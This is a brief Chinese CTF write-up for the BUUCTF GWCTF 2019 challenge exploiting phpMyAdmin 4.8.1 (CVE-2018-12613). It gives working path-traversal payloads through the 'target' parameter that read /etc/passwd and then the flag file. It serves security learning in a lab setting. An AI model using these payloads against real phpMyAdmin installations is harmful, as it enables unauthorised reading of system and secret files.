标签：phpmyadmin BUUCTF .. flag datadict 漏洞 GWCTF 2019 payload

考点：

　1.目录扫描

　2.phpmyadmin 4.8.1漏洞

开启靶场

 查看源码，抓包都没发现什么。御剑进行扫描。

都看一下

 这俩都没啥作用，那么就在/phpmyadmin/里

 里面也没我们需要的东西，网上搜搜关于phpmyadmin版本的漏洞

【首发】phpmyadmin4.8.1后台getshell (qq.com)

cve-2018-12613-PhpMyadmin后台文件包含 - 简书 (jianshu.com)

（学习这两篇后，发现确实存在漏洞，构造payload）

payload: /phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd  

 成功读取，尝试将文件改为flag.

payload: /phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

得到flag。 

标签：phpmyadmin,BUUCTF,..,flag,datadict,漏洞,GWCTF,2019,payload
来源： https://www.cnblogs.com/l0y0h/p/15460386.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。